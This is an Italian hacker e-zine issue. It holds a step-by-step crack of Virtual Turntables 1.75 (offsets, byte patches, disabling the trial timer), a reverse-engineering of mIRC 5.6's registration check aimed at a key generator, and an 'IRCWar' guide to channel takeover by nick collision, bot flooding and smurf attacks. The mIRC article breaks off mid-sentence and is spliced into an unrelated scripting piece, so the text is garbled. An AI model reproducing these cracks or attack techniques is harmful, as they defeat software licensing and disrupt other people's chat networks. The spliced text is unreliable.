²°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°² ²°°°ÛÛ°°°°ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ²²²²ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°² ²°°°ÛÛ°°°°°°°°ÛÛÛÛÛÛÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°² ²°°°ÛÛ°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°ÛÛ°°°°ÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°² ²°°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛ°°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ HOW TO VTT 1.75 ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ SOLITA PREMESSA: non sono un cracker, non sono un hacker, sono un newbies come voi. Quindi se troverete in questo articolo qualche imprecisione e/o qualke stronzata non venitevi a lamentare :) Saluti: DantuzAliguz, nobo, harlok, yado, falcon, dev666, lord, ecc . . . Per questo quarto numero di newbies, tanto per cambiare, ho deciso di scrivere un articolo sul cracking. Iniziamo subito senza perdere troppo tempo . . . Oggi crakkeremo Virtual Turntables 1.75. Ho deciso di scrivere un articolo su questo prog xche' mi ha incuriosito il suo sistema di protezione. Gli strumenti necessari sono sempre i soliti: il mitico SI (che cmq lo useremo poco xche' il lavoro l'ho gia' fatto io;), Windasm e Hiew Installiamolo e per iniziare diamo un'okkiata al prog. All'avvio ci appare un primo nag screen poi nel menu' appare un tasto register!. MMM ok. I problemi sorgono quando cercheremo di disattivare il timer che dopo 20 min ci chiude il prog !! Ma procediamo con calma . . . per ora proviamo a togliere il nag e il tasto register! Apriamo windasm e disassebliamo il vtt.exe. Clikkiamo su Functions/Imports. Ecco la lista di tutte le chiamate che il prog effetua. Naturalmente ci salta subito all'occhio quella kiamata Devices.?CheckRegistered@@YAHXZ Ci rediamo conto che il prog effettua questa kiamata in quattro punti che riporto: * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :004122CC E851500100 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :00417D50 E8CDF50000 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :00417D85 E898F50000 Call 00427322 * Reference To: Devices.?CheckRegistered@@YAHXZ, Ord:0029h :0041998B E892D90000 Call 00427322 Ma attenzione . . dopo ogni chiamata al device.dll il prog in tutte e 4 i punti confronta eax con il valore 01. Per far credere al programma di essere registato bastera' forzare in tutti e 4 i punti il jmp condizionato. Procediamo modificando l'offset 122D8 da 74(je) in EB(jmp) Quindi il je all'offest 17D58 da 74(je) EB(jmp) Il je 17D8D da 74(je) EB(jmp) e per finire il 0F al 19995 in E9 con un 83 al 19996, un 00 all'19997 e un 90(nop) all'1999A Avviamo VTT ed ecco che il nostro amato programma parte senza quel fastidioso Nag iniziale e il tasto register! nel menu. Passiamo ora alla fase numero 2 (ben + complicata) Se non avete capito niente fino ad ora . . . vi consiglio di rileggerlo con + attenzione o se siete negati x il cracking passate pure al prossimo articolo. Il programma dopo 20 min da quando viene aperto si kiude automaticamente utilizzado probabilmente un timer interno. Probabilmente esistono altri modi per arrivare alla soluzione, ma preferisco procedere per ora in questo modo che credo sia il + facile da spiegare. Avviamo l'SI e attiviamo un BPX su MessageBoxA Quindi CTRL+D per uscire. Avviamo vtt e attendiamo i 20 min necessari (uufff per perdere tempo provate a mixarvi qualke mp3 :)) OK 19 min . . . 20 !! Premete F12 per uscire dall'user32, clikkate su ok poi F12 fino a quando non vi trovate in qualkosa del tipo TMP1090.dll (il numero 1090 puo' anke cambiare). A questo punto vi chiederete: ma do' sta sto TMP1090.dll ???? Bhe ve lo dico io . . . e' un dll temporaneo che il programma decrypta e posiziona nella temp di windows con un nome radom (ecco xche' vi dicevo che il 1090 puo' cambiare). Direte voi bhe apriamo sto file forziamo i jmp e il gioco e' fatto !! NO Non si puo' fare !! Il file temporaneo e' quello che si ottiene decryptando il file InitSound.dat che si trova nella stessa dir di VTT. Noterete che la differenza tra il file tmp e il initsound.dat e' di un solo byte ma il secondo essendo un dll cryptato non e' possibile apriro col windasm e quindi modificarlo !! Quando poi kiudiamo il vtt.exe il file tmp viene automaticamente cancellato senza che noi ci accorgessimo di nulla. Appreso questo serve un po' di ragionamento per riuscir a fregare il ben studiato prog. Bhe non avete voglia di ragionare ??? non avete tempo ??? allora ve lo dico io . . . Tutto quello che vi sto per dire e' il frutto di un'ispirazione . . . Skematizzo il tutto per rendere + facile: COSA FA VTT.EXE controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato ... non c'e' problem,a controllasse pure :))) NEL DEVICES.DLL preleva il file initsound.dll lo decrypta gli assegna un nome random lo mette nella dir temp di windows effettua una kiamata al file ALL'INTERNO DEL FILE TEMPORANEO controlla se il prog e' registato se non lo e' avvia il timer inizializza l'audio (PORC' PROPRIO QUI DOVEVA FARLO ????) NEL DEVICES.DLL cancella il file temp Lo skema e' abbastanza chiaro . . . credo :)) Bhe se il fottuto del programma non inizializzasse l'audio nel file temporaneo sarebbe bastato cancellare la kiamata al file stesso impedendo in ogni caso che il timer venga avviato. Ma cio' non e' possibile quindi cercheremo di optare x un'altra via . . . Ora skematizza l'altra via: ALTRA VIA: controlla se registrato nel vtt.exe (jmp che abbiamo gia' forzato . . . non c'e' problema, controllasse pure :))) NEL DEVICES.DLL salta salta salta salta effettua una kiamata al file (eheh gia' decryptato e modificato che noi avremo posizionato nell dir di vtt) ALL'INTERNO DEL FILE TEMPORANEO controlla se il prog e' registato anke se non lo e' facciamo in modo che il timer non venga avviato inizializza l'audio (OK) NEL DEVICES.DLL NON cancella il file temp (xche' non e' + un temporaneo) Tutto kiaro ???? Bhe vediamo ora come si puo' fare . . . Prima di tutto procuriamoci il dll che il nostro mitico vtt ci decrypta e ci mette nella temp di win. Quindi avviamo il prog, buttiamolo giu', apriamo il gestione risorse e copiamoci il file tmpxxxx.tmp nella dir di vtt rinominandolo in devilcrk.dll. Ci okkuperemo dopo di questo file. Per ora procediamo con il devices.dll facendogli saltare il processo del decrypt. Procediamo pure con il Windasm. Apriamo il file a diamo un'akkiata a Functions/Imports * Reference To: KERNEL32.GetTempFileNameA, Ord:0163h OOH MA KE BELLO !! Clikkiamo due volte su KERNEL32.GetTempFileNameA: * Referenced by a CALL at Address: |:10006361 | :10005E60 6AFF push FFFFFFFF :10005E62 64A100000000 mov eax, dword ptr fs:[00000000] :10005E68 68D8830010 push 100083D8 :10005E6D 50 push eax :10005E6E B828130000 mov eax, 00001328 :10005E73 64892500000000 mov dword ptr fs:[00000000], esp :10005E7A E8211E0000 call 10007CA0 :10005E7F A144E60010 mov eax, dword ptr [1000E644] :10005E84 :10005E85 :10005E87 :10005E88 :10005E89 :10005E8A :10005E8C :10005E8D :10005E92 :10005E98 :10005E9F :10005EA0 53 8BC8 55 40 56 85C9 57 A344E60010 0F851B020000 8D9424F0010000 52 6800010000 push ebx mov ecx, eax push ebp inc eax push esi test ecx, ecx push edi mov dword ptr [1000E644], eax jne 100060B3 lea edx, dword ptr [esp+000001F0] push edx push 00000100 * Reference To: KERNEL32.GetTempPathA, Ord:0165h | :10005EA5 FF1548900010 Call dword ptr [10009048] :10005EAB 8D8424EC000000 lea eax, dword ptr [esp+000000EC] :10005EB2 8D8C24F0010000 lea ecx, dword ptr [esp+000001F0] :10005EB9 50 push eax :10005EBA 6A00 push 00000000 * Possible StringData Ref from Data Obj ->"tmp" | :10005EBC 68CCE20010 push 1000E2CC :10005EC1 51 push ecx * Reference To: KERNEL32.GetTempFileNameA, Ord:0163h | :10005EC2 FF154C900010 Call dword ptr [1000904C] Esaminiamo un po' cosa accade qui . . . Il tutto inizia con una kiamata dal 10006361. Nella stringa :10005E92 0F851B020000 jne 100060B3 viene effettuato un controllo: e' gia' stato creato il file temp ??? Se no continua con il codice . . . nel caso contrario effettua il jmp. Ma sikkome a noi non serve che il file venga creato forziamo il jmp in modo tale ke il salto venga compiuto cmq in ogni caso. Prendiamo l'offset (5E92) e proseguiamo con l'hiew. Cerchiamo con F5 l'offset poi F3 per modificare il file e con F2 modifichiamo il jne in jmp (attenzione nella riga successiva e' necessario poi mettere un nop) Riprendiamo il Windasm ed esaminiamo ora il codice dopo il jmp che riporto qui: * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10005E92(C) | :100060B3 6840E50010 push 1000E540 <===== * Reference To: MFC42.MFC42:NoName0010, Ord:04A9h | :100060B8 E8C91F0000 Call 10008086 * Reference To: KERNEL32.GetLastError, Ord:011Ah | :100060BD 8B1D50900010 mov ebx, dword ptr [10009050] :100060C3 8BE8 mov ebp, eax Ci troviamo a questo punto sulla stringa 100063B3 In questo punto il prog fa un push di 1000E540 dove si trova la path del file temporaneo (sara' qualkosa tipo: c:\windows\temp\tmpxxxx.tmp che a noi servira' modificare in devilcrk.dll) Per far questo riapriamo il nostro sempre amato Hiew con F4 scegliamo Hex quindi con F5 cerchiamo la stringa E540. Procediamo con la modica con F3 quindi F8 e inserite nel campo ASCII devilcrk.dll premete invio e poi F8. A questo punto vedrete sulla destra il testo inserito F9 x salvare. Potete anche provare a far partire vtt per verificare se avete fatto tutto correttamente. Il programma dopo 20 min si kiudera' ancora ma la differenza sara' che vtt non creera' piu' il file temporaneo e quindi andra' sempre a rikiamare il nostro devilcrk.dll. Opss . . . porc' . . . se kiudiamo il programma, vtt canellera' il file devilcrk.dll credendo sia un file temporaneo. Procediamo eliminando la chiamata che ci cancella il nostro benedetto file. Quindi: windasm, devices.dll, functions, imports, mmmm Ma guarda che bella kiamata al KERNEL32.DeleteFileA !!! hihi clikkiamo 2 volte . . . ci troviamo qui' * Reference To: MFC42.MFC42:NoName0009, Ord:047Fh | :10006178 E8031F0000 Call 10008080 :1000617D A144E60010 mov eax, dword ptr [1000E644] :10006182 48 dec eax :10006183 A344E60010 mov dword ptr [1000E644], eax :10006188 750A jne 10006194 :1000618A 83C604 add esi, 00000004 :1000618D 56 push esi * Reference To: KERNEL32.DeleteFileA, Ord:0057h | :1000618E FF1544900010 Call dword ptr [10009044] <===Qui' * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10006188(C) | :10006194 5E pop esi :10006195 C3 ret A questo punto sara' necessario cancellare questa kiamata ma dobbiamo cancellare anke l'add esi,04 e il push dell'esi altrimenti mandiamo in tilt il programma :)) L'offset della 1000618A e' 618A Apriamo Hiew e noppiamo dalla 618A fino alla 6193 con il codice eax 90 (nop) Fatto questo, possiamo riaprire vtt, chiuderlo e constatare che il file devilcrk.dll non viene + cancellato. Sara' ora necessario crakkare il file devilcrk.dll affinke' non venga avvito il timer. Vediamo un po' che si puo' fare . . . Aprima con Windams il file Refs/String data reference "**** YOUR TIME LIMIT HAS NOW EXPIRED!! " Clikkiamo 2 volte: * Referenced by a (U)nconditional |:10001A1A(C), :10001A53(C) | :10001A71 B801000000 :10001A76 5E :10001A77 C3 or (C)onditional Jump at Addresses: :10001A78 :10001A79 :10001A7A :10001A7B :10001A7C :10001A7D :10001A7E :10001A7F nop nop nop nop nop nop nop nop 90 90 90 90 90 90 90 90 Exported fn(): DllCheckRegistered :10001A80 E81B020000 :10001A85 8B0D80530010 :10001A8B 33C0 :10001A8D 85C9 :10001A8F 0F95C0 :10001A92 C3 mov eax, 00000001 pop esi ret - Ord:0001h call 10001CA0 mov ecx, dword ptr [10005380] xor eax, eax test ecx, ecx setne al ret :10001A93 :10001A94 :10001A95 :10001A96 :10001A97 :10001A98 :10001A99 :10001A9A :10001A9B :10001A9C :10001A9D :10001A9E :10001A9F 90 90 90 90 90 90 90 90 90 90 90 90 90 nop nop nop nop nop nop nop nop nop nop nop nop nop * Referenced by a CALL at Address: |:100019FA | :10001AA0 8B4C2404 mov ecx, dword ptr [esp+04] :10001AA4 8B442408 mov eax, dword ptr [esp+08] :10001AA8 6A00 push 00000000 :10001AAA 50 push eax :10001AAB 8B11 mov edx, dword ptr [ecx] :10001AAD 52 push edx * Reference To: DSOUND.DirectSoundCreate, Ord:0003h | :10001AAE E89D070000 Call 10002250 :10001AB3 F7D8 neg eax :10001AB5 1BC0 sbb eax, eax :10001AB7 40 inc eax :10001AB8 C3 ret :10001AB9 :10001ABA :10001ABB :10001ABC :10001ABD :10001ABE :10001ABF :10001AC0 :10001AC6 :10001AC7 :10001AC8 :10001AC9 90 90 90 90 90 90 90 81ECE8030000 53 55 56 57 nop nop nop nop nop nop nop sub esp, 000003E8 push ebx push ebp push esi push edi * Reference To: MFC42.MFC42:NoName0004, Ord:0497h | :10001ACA E887090000 Call 10002456 :10001ACF 85C0 test eax, eax :10001AD1 7410 je 10001AE3 * Reference To: MFC42.MFC42:NoName0004, Ord:0497h | :10001AD3 E87E090000 Call 10002456 :10001AD8 8B10 mov edx, dword ptr [eax] :10001ADA 8BC8 mov ecx, eax :10001ADC FF527C call [edx+7C] :10001ADF 8BD8 mov ebx, eax :10001AE1 EB02 jmp 10001AE5 * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10001AD1(C) | :10001AE3 33DB xor ebx, ebx * Referenced by a (U)nconditional or (C)onditional Jump at Address: |:10001AE1(U) | :10001AE5 68804F1200 push 00124F80 * Reference To: KERNEL32.Sleep, Ord:023Fh | :10001AEA FF15EC600010 Call dword ptr [100060EC] :10001AF0 83C9FF or ecx, FFFFFFFF * Possible StringData Ref from Data Obj ->"**** YOUR TIME LIMIT HAS NOW EXPIRED!! " I jmp all'10001A1A e 10001A53 sono quelli che cerkiamo :10001A1A 7555 :10001A53 751C jne 10001A71 jne 10001A71 Ci bastera' modificare i jne degli offset E1A e E53 in je con il nostro hiew Avviamo vtt . . . 5 10 20 30 min . . . WoW il gioco e' fatto !! X eventuali domande, crtitiche, minacce di morte, la mia mail e' [email protected] sempre pronto a rispondere ad ogni vostro messaggio. Alla proxima DeViLNeT ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ GENERATORE DI CHIAVI X MIRC32 5.6 ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Autore: cod Oggetto: mIRC32 5.6 Obiettivo: Generatore di chiavi Strumenti: SoftICE 4.0 IDA 3.8a Window Disassembler 8.93 Livello: BOOOO DECIDETE VOI NOTA: L'AUTORE NON SI ASSUME NESSUNA RESPONSABILITA' PER CIO' CHE FARETE DI QUESTO DOCUMENTO... CESTINATELO E ACQUISTATE IL mIRC (in tal caso sarete SCEMI) N.B.: LE INFORMAZIONI CONTENUTE QUI SONO FRUTTO DELLE MIE FANTASIE PERVERSE E DI QUELLE DEGLI AUTORI DI SOFT ICE E DI IDA mIRC32 Š il pi— diffuso programma di IRC in ambiente Windows. Il programma ha un costo di 20 dollari pari a circa 40.000 lire (per eccesso). Non Š una gran cifra da sborsare e non venite a dire che il programma non Š utile. Vogliamo acquistare tale programma, perchŠ siamo gente onesta (... spero voi) quindi leggiamo la guida in linea... cosa dice? Abbiamo due modi per spedire i soldi... mandandoli via posta ordinaria al seguente indirizzo: Khaled Mardam-Bey Apt. 347, 56 Gloucester Road, London SW7 4UB, UK ... questo modo non Š tanto sicuro.. chiss… quando arriveranno... vediamo il 2. modo: Registrazione on-line, Š richiesto un numero di carta di credito... be se avete una carta di credito scegliete questa via e smettete di leggere. Siete ancora qui ? Allora avete lo stesso problema mio... niente carta di credito (non provate con i generatori...) allora cosa possiamo fare? L'unico sarebbe crackare il programma, ma ad ogni aggiornamento ci toccher… crackare! E' gi… perchŠ la minima variazione a livello di codice sorgente pu• generare un file eseguibile totalmente diverso! Allora non lo crackiamo... facciamo un p• di reverse enginering (non sapete che Š ? allora... reverse significa inverso engin motore... o qualcosa del genere... quindi fare ci• che fa il programma all'inverso) Ma cosa ci pu• interessare a noi ? La procedura di registrazione, ed il calcolo della PASSWORD. Allora lanciamo il programma WDASM e disassembliamo l'eseguibile MIRC32.EXE Cerchiamo la parola 'Sorry'... trovata ecco! Andiamo un p• su nel codice e noteremo un salto condizionale... Andiamo all'istruzione che effettua il salto e troviamo il seguente codice: PUSH PUSH CALL TEST JE DWORD DWORD XXXXXXXX EAX, EAX YYYYYYYY * * * * * Questa DWORD punta al seriale Questa DWORD punta al nome Chiama una funzione Confronta EAX Salta se EAX Š uguale a 0 Traduciamo questo codice in un linguaggio ad alto livello: if ValidatePassword(Name, Password) = 0 goto error ok ora andiamo ad analizzare la funzione CALL... La prima cosa che fa questa funzione Š quella di chiamare un'altra funzione che ritorna un numero intero: name_len=strlen(Name); if (name_len < 5) return 0; Quindi se il nome inserito Š minore di 5 caratteri ritorna 0 e il programma ci rimanda a error. Subito dopo questo if troviamo un'altra funzione che ha come parametri esattamente Name e Password... chiameremo tale funzione GenerateKey... new_key=GenerateKey(Name, Password); if (new_key != 0) goto continue else return 1; Ma il valore new_key cosa contiene ? Potrebbe contenere la nostra password quindi andiamo ad analizzare questa funzione! La prima cosa che fa il programma Š quella di trovare il trattino nella password per scomporla in due sub codici. Per questo viene usata la funzione _strchr che richiede come parametri l'indirizzo della stringa da analizzare e il carattere da cercare. new_address=_strchr(Password,'-'); if (new_address == 0) return 0; Password[new_address]=0; first_key=atol(Password); /* atol converte una stringa in intero a 32bit */ Password[new_address]='-'; second_key=atol(new_address+1); Avete capito come fa a suddividere la password ? Semmai new_address dovesse essere uguale a 0 il programma va in errore Una volta che il programma ha salvate le due password in memoria nelle variabili long utilizza la funzione _strlen(Name) per calcolare la lunghezza Affinale non vi e' piu' nulla da kapire sul funzionamento degli identifikatori e poi a tempo debito li analizzeremo uno per volta kuando dovremo inserirli nella sezione remote, per ora potete dare uno sguardo all'help e sfogliare la varie kategorie di ident. ma ripeto non serve a un gran ke farlo... 009 *** USO DEI KOMANDI DI mIRC *** Bene, benetton, vi lascio un kompito per kasa: aprite il vostro help del mIRC e sfogliatevi la sezione *mIRC Commands* non e' necessario ke impariate tutti i komandi, ma komunkue dateci uno sguardo, i komandi sono kome i komponenti di un'auto, non ne potete kostruire una solo kon i karburatori e le spazzole per i tergikristalli, kosi' per gli skript dentro non ci potete mettere solo /echo /quit e /join dovrete metterci ben altro... 010 *** NELLA PROXIMA PUNTATA *** Vedete di prokurarvi un server irc da installarvi perke' sara' essenziale. Finalmente inizieremo a parlare di kome strutturare delle risposte agli eventi e se ce la faccio vi spiego pure kome implementare alkune protezioni... In kuest'art. avevo detto a Nobody88 ke vi avrei parlato gia' della realizzazione di uno skript, e delle relative protezioni e automatismi, ma skrivendo kuesto art., mi sono akkorto ke senza una base non sareste andati molto lontano... 011 *** SALUTAGGi VARi *** SALUTI ALLA MIA KREW: -AnArChY per me sarai siempre l'anarkiko =)) -CrazyHorzo un'altro floddattero kome me... -N0CE & Kaliforn & Kelvin KAxxO fateve senti'!!! -agli altri un saluto generiko :P SALUTI A GENZ VARIA: -^S|{0rP|0 un 'ggiorno riusciremo ad ankontrarci =))) -|guly- infinite tenkese per tu sai kosa ;) -ghimlet se non mi avresti detto 4 mesi fa di prokurarmi un portscanner non avrei mai studiato l'hack... -micio2 azzo non ti riesko a bekkare piu' fatti senti' in email pliis =) -SALUTO A _kuasi_ TUTTO #HACKERNOW [i bot mika li devo saluta'...] byez genz byez ENNARO [email protected] Mekkanici Digitali Member ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ IRCWAR - FONDAMENTI ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ Quando si parla di IRCWar ci si riferisce in genere a cose tipo takeover di canali e cosi' via... per capire bene questi discorsi bisogna avere una piccola base riguardo irc, i server irc, i netsplit e alcuni comandi e modi di ircnet. Diciamo che il terreno di battaglia principale dei takers e' lo split o il desynch. I server irc splittano a causa del sovraccarico della rete. In genere, prima e dopo lo split c'e' un periodo di desynch, cioe' di desincronizzazione dei server. In questi periodi possono accadere strane cose.. facciamo qualche esempio: - Puo' accadere che un utente kicki un altro utente su un server, ma che su un altro server risulti ancora che l'utente kickato stia dentro il canale. Ovviamente l'utente che e' stato kickato legge ancora quello che gli altri scrivono, a loro insaputa, ma lui non puo' comunque scrivere, in quanto riceve il messaggio "Cannot send to channel". - Se un canale e' opless (cioe' senza operatori) e avviene uno split tra alcuni server, il taker si connette con un altro client sul server che e' splittato e ottiene l'op sul canale, in quanto e' l'unico presente. Al rejoin dei server, nessuno deoppera' il taker poiche' solo lui avra' l'op. - Quando due server splittano, si puo' trovare il modo di killare le persone a noi sgradite. Ad esempio, se il nostro "nemico" ha il nick Techno[K] (uno a caso ;D) e il suo server splitta, noi potremo joinare il server che lui non riesce a vedere e dovremo usare il suo nick. Al rejoin dei server, io e il vero Techno[K] veniamo killati dai server per nick collision, in quanto irc non consente due nick uguali. Se Techno[K] era op su un canale, ovviamente non lo avra' piu' quando rijoinera' perche' disconnesso da irc. Queste sono alcune delle tecniche principali per ottenere un canale. Ovviamente se questo canale e' mantenuto da un certo numero di bot, la cosa sara' molto piu' difficile. In questi casi, dobbiamo osservare bene il canale e capire come i bot funzionano, a quali server sono connessi, e cosi' via, e dovremo prepararci bene al take. Se si ha la possibilita' di smurfare e se si e' capaci, ve lo consiglio vivamente :) Per riuscire a fare take del canale si puo' operare in questo modo: - Far collidere i nick, come spiegato in precedenza, ma questo puo' andar bene solo se i bot sono pochi e se non sono configurati in modo che cambiano nick ogni volta che c'e' uno split. - Floodare o smurfare i bot, usando opportune tecniche... lo smurf e' sicuro, il flood dei bot invece dipende soprattutto dalla botnet sotto esame. Se essa e' configurata bene state certi che non cadranno mai i bot floodandoli con migliaia di scritte o con join o con altre cose. Lo smurf e' sicuro, come dicevo, pero' e' piu' difficile da realizzare. Occore una shell decente da cui smurfare, degli ottimi broadcast e anche bravura quindi non e' per tutti... ;) - Se notate che i bot oppano degli utenti appena essi entrano nel canale, cercate di far cadere colui che e' stato oppato e fottetegli il nick e l'ident. Il bot in qualche caso vi oppera'... e voi sarete padroni di tutto... ovviamente dovrete essere veloci a deoppare e se vi portate alcuni amici e' anche meglio. E' inutile dire che dovrete deoppare prima i bot e i cazzoni con gli script lamer, perche' sono loro che potrebbero kickarvi per massdeop. Alcuni altri consigli e raccomandazioni per l'ircwar: - Dovete sempre preparare tutto prima di farlo... se dovete fare un mass deop osservate bene la situazione, ed e' lo stesso anche per le altre operazioni. - E' ovvio che possedere alcuni bot fa comodo, non devo dirvelo io :) usate anche delle tcl buone se prevedete molti attacchi al vostro canale. - Se riuscite a takare un canale, tenetelo chiuso per uno / due giorni... questo tempo sara' necessario a far raffreddare le testoline dei padroni precedenti, e servira' anche a configurare bene il canale con i relativi bot. St0rM BriNgeR ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ²°°°°°°°°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°°°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°°ÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°°°°ÛÛÛÛ°°°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛÛ°°ÛÛ°°ÛÛ°°°°°°°°°°°°°°°°² ²°°°°°°°°°ÛÛÛÛÛÛ°°°°ÛÛ²²ÛÛ°°°ÛÛ°°°°°°°ÛÛÛÛ°°°°ÛÛ°°ÛÛÛÛ°ÛÛ°°ÛÛ°°ÛÛÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°°ÛÛÛÛÛÛÛÛ°°°ÛÛ°°°Û°°ÛÛ°ÛÛ°°°ÛÛ°°ÛÛ°ÛÛÛÛ°°ÛÛ°°°°ÛÛ°°°°°°°°°°² ²°°°°°°°°°ÛÛ°°ÛÛ°°ÛÛ°°°°°°ÛÛ°°°ÛÛÛÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛ°°ÛÛÛ°°ÛÛÛÛÛÛÛÛ°°°°°°°°°°² ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ NOTA BY N0bodY88 = come al solito questa sezione oltre ad articoli di hacking vero e proprio contiene gli art piu' disparati sempre attinenti all'argomento hacking quindi che dire ... ... godeteveli :) ... e se vi sembra che un art dica cose sbagliate o cmq poco giuste e volete dircelo allora scrivete voi un art sull'argomento cosi' da aiutarci a migliorare sia noi membri di NewBies sia i lettori che magari sull'argomento non ne sanno molto e vanno in cerca di qualcuno che gli spieghi qualcosa o meglio che lo indirizzi verso la strada giusta... ÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏÏ ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ºÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿º º³ IL MIO IP? BOH! ³º ºÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙº ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ ------------<[Il mio IP? BOH!]>---------------------------------------------Autore: Mr_Skull Consumo: 4 toast (faccio skifo), 7 pakketti di crackers (non di hackers), 5/6 preservativi (credete che noi newbies siamo sempre attaccati al computer? Anche noi abbiamo altri piaceri, quindi, nei momenti liberi fra una scrittura e l'altra mi diletto a lanciare gavettoni a chi passa sotto il balcone... :))) Musica ascoltata: (Get your gunn, Cake and Sodomy, Antichrist Superstar Remix & Repent, I don't like the drugs, Sweet Dreams, The Horrible People, The dope show, Great Big White World, Mechanical Animals, Rock is dead)-Marilyn Manson, Freak on a leash-Korn, Narcotic-Liquido, Pretty Fly-offsping e Domenica e Luned• di Branduardi. Saluti: mR_bIs0n, ZeroCool, il BFi Staff (mitici, sempre cos•), il NewBies staff (togliete per• gli articoli su bo e netbus :)) e Slurpzann, nonch‚ un omaggio a Raoul Chiesa. Fuck a: Telekom, il mio preside, la mia skuola (vi ho fottuto l'abbonamento), 